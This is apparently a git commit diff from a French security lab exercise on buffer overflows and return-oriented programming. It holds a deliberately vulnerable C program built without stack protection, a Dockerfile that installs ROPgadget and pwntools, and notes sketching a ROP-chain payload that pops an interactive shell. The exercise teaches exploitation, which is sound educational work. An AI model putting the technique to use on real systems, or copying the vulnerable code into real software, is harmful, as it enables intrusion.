✨ PRESQUE FINI

2 years ago · e6cf606ab4
parent 4cbcd36c74
commit e6cf606ab4
3 changed files with 31 additions and 12 deletions
--- a/Bufferoverflow/main.c
+++ b/Bufferoverflow/main.c
@ -1,12 +1,9 @@
 #include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>

-void secretFunction()
-{
-    printf("Congratulations!\n");
-    printf("You have entered in the secret function!\n");
-}
-
-void echo()
+void check()
 {
    char buffer[20];
    printf("Enter some text:\n");
@ -16,6 +13,8 @@ void echo()

 int main()
 {
-    echo();
+    check();
    return 0;
 }
+
+//python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
--- a/7
+++ b/7
@ -1,16 +1,17 @@
 FROM ubuntu:latest

 RUN apt-get update && \
-    apt install -y python3 gcc musl-dev python3-pip && \
+    apt install -y python3 gcc musl-dev python3-pip gdb nano && \
    python3 -m pip install ROPgadget && \
-    python3 -m pip install capstone
+    python3 -m pip install capstone && \
+    python3 -m pip install pwntools

 COPY Bufferoverflow /root/Bufferoverflow
 COPY ROPgadget /root/ROPgadget

 WORKDIR /root/Bufferoverflow

-RUN gcc main.c -o binaire -fno-stack-protector
+RUN gcc main.c -o binaire -fno-stack-protector -ggdb -Wl,-z,relro,-z,now,-z,noexecstack -static

 WORKDIR /root

--- a/TP.txt
+++ b/TP.txt
@ -1,2 +1,21 @@
 Combien de gadgets possède le binaire nommé "binaire" dans le dossier Bufferoverflow ?

+---
+
+docker build . -t secu
+
+docker run --rm -it secu
+
+---
+
+python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
+
+dans un fichier python : 
+    p = b'A' * 120 => buffer overflow
+    p += pack('<Q', 0x0000000000495f90) # add rax, 1 ; ret => p += p64(0x0000000000401fa4) # syscall : on convertit en p64 car la convertion est nul 
+
+    r.process("./binaire") => on execute le binaire
+    r.sendline(p) => on met dans le buffer toutes les adresses et l'attaque Bufferoverflow
+    r.interactive() => on met a disposition le shell interactif sur le terminal
+
+